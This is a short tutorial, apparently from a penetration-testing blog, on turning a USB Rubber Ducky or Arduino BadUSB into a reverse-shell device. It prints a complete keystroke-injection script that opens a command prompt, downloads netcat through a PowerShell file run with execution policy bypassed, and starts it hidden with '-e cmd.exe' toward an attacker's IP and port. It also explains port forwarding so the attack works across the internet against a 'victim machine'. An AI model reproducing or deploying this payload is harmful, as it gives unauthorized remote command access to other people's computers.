How To'sNetwork PentestOperating SystemsPenetration TestingWindows

Get a Reverse Shell in Seconds using USB Rubber Ducky & Arduino BadUSB

Today We’re going to setup a reverse shell in USB Rubber Ducky and Arduino BadUSB. And using netcat for a reverse shell. You can find the 60 best Rubber Ducky USB payloads.

How to get a Direct link?

wget 'NETCAT_DL_LINK'

Replace it with this:

wget 'http://example.com/netcat.exe'

How to get your IP & Port?

You need to find the IP Address of your machine where you’re gonna use the Netcat listener to get a reverse shell. And for port if you wanna use this on your network then you don’t need to port forward if you wanna conduct this attack on the WAN network then you have to port forward through your router it’s very easy but still many are failed to port forward.

Let us know if you face a similar issue with port forwarding.

STRING START /MIN a.exe IP PORT -e cmd.exe -d & exit

The code will look like this:

STRING START /MIN a.exe 192.168.1.2 8080 -e cmd.exe -d & exit

This code below is for rubber ducky! 

DELAY 400
GUI r
DELAY 100

STRING cmd
ENTER
DELAY 100

STRING cd / & mkdir win & cd win & echo (wget 'NETCAT_DL_LINK' -OutFile a.exe) > b.PS1 & powershell -ExecutionPolicy ByPass -File b.ps1
ENTER
DELAY 50

STRING START /MIN a.exe IP PORT -e cmd.exe -d & exit
ENTER

If you wanna convert this Rubber Ducky Script to Arduino BadUSB! You need to use an IDE to compile the code for your Arduino BadUSB.

Now you’re done with your Rubber Ducky and Arduino since you pasted your compiled code on your USB. Then you have to setup a Netcat listener on your attacker machine and start the listening port and boom you’ll get a session when you plug in that USB on your victim machine.

Noor Qureshi

Experienced Founder with a demonstrated history of working in the computer software industry. Skilled in Network Security and Information Security.

Related Articles

Back to top button